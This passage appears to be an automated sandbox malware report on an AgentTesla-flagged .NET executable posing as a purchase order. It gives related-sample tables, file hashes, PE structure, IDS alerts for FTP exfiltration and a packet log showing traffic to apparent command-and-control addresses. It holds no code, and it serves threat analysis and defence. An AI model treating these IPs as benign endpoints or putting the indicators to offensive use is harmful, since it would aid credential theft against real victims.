| | Richardson Electronics, LTD. PRD10221301UUE.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | PURCHASE ORDER ADDISON-6378397379UUE.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | Teklif-6205018797-6100052155-UUE.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | BROU_Copia de Pago_PDF.exe | Get hash | malicious | Unknown | Browse | 5.2.84.221 |
| | BROU_Copia de Pago_PDF.exe | Get hash | malicious | Unknown | Browse | 5.2.84.221 |
| AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | na.elf | Get hash | malicious | Mirai | Browse | 103.33.73.172 |
| | Remittance_Regulvar.htm | Get hash | malicious | Unknown | Browse | 103.67.200.72 |
| | 2LgQzImW3E.elf | Get hash | malicious | Mirai | Browse | 103.183.119.56 |
| | Quote.exe | Get hash | malicious | Remcos | Browse | 103.186.117.77 |
| | f8fKadLyb4.elf | Get hash | malicious | Mirai | Browse | 150.203.163.29 |
| | zYJYK66EGb.exe | Get hash | malicious | Remcos | Browse | 103.186.116.195 |
| | na.elf | Get hash | malicious | Unknown | Browse | 134.150.211.105 |
| | na.elf | Get hash | malicious | Unknown | Browse | 132.234.242.215 |
| | DocuSign-Docx.pdf | Get hash | malicious | Unknown | Browse | 103.67.200.72 |
| | na.elf | Get hash | malicious | Gafgyt | Browse | 103.14.48.192 |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 3b5074b1b5d032e5620f69f9f700ff0e | Agency Appointment.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 103.191.208.122 |
| | rShipmentNotification_.exe | Get hash | malicious | AgentTesla | Browse | 103.191.208.122 |
| | AkIhFFUNs2.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 103.191.208.122 |
| | Jia Run-Full_Appointment_Letter_JRP-252432-1.pdf.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 103.191.208.122 |
| | asegurar.vbs | Get hash | malicious | Unknown | Browse | 103.191.208.122 |
| | payment confirmation.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 103.191.208.122 |
| | Payment attachment.exe | Get hash | malicious | MassLogger RAT | Browse | 103.191.208.122 |
| | 0001047757804_092024.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 103.191.208.122 |
| | ynwj.ps1 | Get hash | malicious | Unknown | Browse | 103.191.208.122 |
| | fBcMVl6ns6.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 103.191.208.122 |
                                        No context
                                        Process:C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):9728
                                        Entropy (8bit):4.987364829761206
                                        Encrypted:false
                                        SSDEEP:192:XNwfhPQWzJTuFZVFJ5pztwaqRI3INwEvRknn/cE7TSAl:9QpxTufjJ5pzt3Kw0Rkn0dA
                                        MD5:0C3D0B4CD6833A23EBC0687D97C64D73
                                        SHA1:41BAE7DF2F2544B207777C920429383A88745035
                                        SHA-256:F0FA4E57BE6D0AD0DEBBBB9189344A61896D0D38C6C9F2345D2421070E20389C
                                        SHA-512:DBF66BF2CB3B1124FA7F9F396C4B979388E6DFAE9CA2BEC6B6C792D6F5D4F23F8827330712419394EB1989654AF7F6D7CCD14C3FD8582870A7FA774207C80B80
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 16%
                                        • Antivirus: Virustotal, Detection: 26%, Browse
                                        Reputation:low
                                        Process:C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):4.987364829761206
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:GEFA-Order 232343-68983689.exe
                                        File size:9'728 bytes
                                        MD5:0c3d0b4cd6833a23ebc0687d97c64d73
                                        SHA1:41bae7df2f2544b207777c920429383a88745035
                                        SHA256:f0fa4e57be6d0ad0debbbb9189344a61896d0d38c6c9f2345d2421070e20389c
                                        SHA512:dbf66bf2cb3b1124fa7f9f396c4b979388e6dfae9ca2bec6b6c792d6f5d4f23f8827330712419394eb1989654af7f6d7ccd14c3fd8582870a7fa774207c80b80
                                        SSDEEP:192:XNwfhPQWzJTuFZVFJ5pztwaqRI3INwEvRknn/cE7TSAl:9QpxTufjJ5pzt3Kw0Rkn0dA
                                        TLSH:D1121911B7B8C633C8BE073194F7821013B4B2157852DBCC1DCD51DF9A12FA4A6A3796
                                        Icon Hash:90cececece8e8eb0
                                        Entrypoint:0x403bae
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x670636CB [Wed Oct 9 07:54:51 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3b60 | 0x4b | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x5b6 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x1bb4 | 0x1c00 | 5fb99836ae108650e5ad677699209cc6 | False | 0.5514787946428571 | data | 5.427442310265788 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x4000 | 0x5b6 | 0x600 | 7c26b62f896f8022014b45c5b29bd0f5 | False | 0.4192708333333333 | data | 4.119521525818458 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x6000 | 0xc | 0x200 | d9e08422d3077fe0be94f8ec16840100 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x40a0 | 0x32c | data | | | 0.4273399014778325 |
| RT_MANIFEST | 0x43cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-09T10:51:06.765174+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49731 | 5.2.84.236 | 21 | TCP |
| 2024-10-09T10:51:07.397881+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49732 | 5.2.84.236 | 54172 | TCP |
| 2024-10-09T10:51:07.404047+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49732 | 5.2.84.236 | 54172 | TCP |
| 2024-10-09T10:51:22.680290+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49740 | 5.2.84.236 | 21 | TCP |
| 2024-10-09T10:51:23.289578+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49741 | 5.2.84.236 | 59878 | TCP |
| 2024-10-09T10:51:23.295500+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49741 | 5.2.84.236 | 59878 | TCP |
| 2024-10-09T10:51:31.312442+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.4 | 49743 | 5.2.84.236 | 21 | TCP |
| 2024-10-09T10:51:31.937083+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49744 | 5.2.84.236 | 50958 | TCP |
| 2024-10-09T10:51:31.942584+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49744 | 5.2.84.236 | 50958 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Oct 9, 2024 10:51:01.911034107 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.911109924 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.911209106 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.911290884 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.911663055 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.911889076 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.912128925 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.912236929 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.912277937 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.912285089 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.912307024 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.912319899 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.912389994 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.912487030 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.913067102 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.913163900 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.913232088 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.913315058 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.913817883 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.913903952 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998306990 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998472929 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998552084 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998552084 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998574018 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998603106 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998651028 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998660088 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998675108 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998706102 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998711109 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998739004 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.998807907 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.998809099 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.999084949 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.999241114 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.999254942 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.999336958 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:01.999583960 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:01.999744892 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.000010967 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.000114918 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.000124931 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.000149965 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.000205994 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.000205994 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.000761986 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.000827074 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.000921965 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.001048088 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.001070976 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.001132011 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.001745939 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.001877069 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.001888037 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.002016068 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.002075911 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.002075911 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.002083063 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.002120972 CEST44349730103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:02.002182961 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:02.025971889 CEST49730443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:04.664238930 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:04.672739029 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:04.672844887 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:05.319823027 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:05.324054003 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:05.329200029 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:05.549638033 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:05.556726933 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:05.561703920 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:05.856355906 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:05.856547117 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:05.861490011 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.081975937 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.082195997 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:06.087410927 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.307672024 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.307852030 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:06.312880993 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.533163071 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.533437967 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:06.538796902 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.758912086 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.759753942 CEST4973254172192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:06.765026093 CEST54172497325.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:06.765120029 CEST4973254172192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:06.765173912 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:06.770673990 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:07.397644043 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:07.397881031 CEST4973254172192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:07.397964001 CEST4973254172192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:07.403098106 CEST54172497325.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:07.403985023 CEST54172497325.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:07.404047012 CEST4973254172192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:07.441575050 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:07.624701977 CEST21497315.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:07.675975084 CEST4973121192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:15.628856897 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:15.628941059 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:15.629034042 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:15.636913061 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:15.636964083 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:16.645559072 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:16.645669937 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:16.648689985 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:16.648715019 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:16.648960114 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:16.691690922 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:16.709661961 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:16.751419067 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.205180883 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.205219030 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.205225945 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.205293894 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.205328941 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.254115105 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.438308954 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.438342094 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.438491106 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.438491106 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.438556910 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.438577890 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.438613892 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.438630104 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.438766003 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.438786983 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.438832045 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.438843012 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.440284967 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.440304995 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.440347910 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.440366030 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.670418978 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.670439959 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.670561075 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.670871973 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.670933008 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.671837091 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.671905994 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.672283888 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.672353983 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.673099041 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.673165083 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.673319101 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.673378944 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.674181938 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.674251080 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.710906982 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.711019039 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.903367996 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.903459072 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.903561115 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.903637886 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.903675079 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.903745890 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.904568911 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.904630899 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.904858112 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.904918909 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.905500889 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.905572891 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.905745029 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.905817032 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.908219099 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.908308983 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.909719944 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.909780025 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.909789085 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.909797907 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.909857988 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.909945011 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.909998894 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.910027027 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.910062075 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.910092115 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.910109997 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.910155058 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.910223961 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.910327911 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.910342932 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.910377026 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.910393953 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.943918943 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.943998098 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.990746021 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.990840912 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:17.991008997 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:17.991077900 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.136501074 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.136604071 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.136662960 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.136734009 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.136847973 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.136910915 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.137281895 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.137346983 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.137479067 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.137538910 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.137918949 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.137991905 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.138128996 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.138196945 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.138628960 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.138709068 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.138907909 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.138971090 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.141798973 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.141885042 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.142065048 CEST44349735103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:18.142129898 CEST49735443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:18.142345905 CEST44349735103.191.208.122192.168.2.4
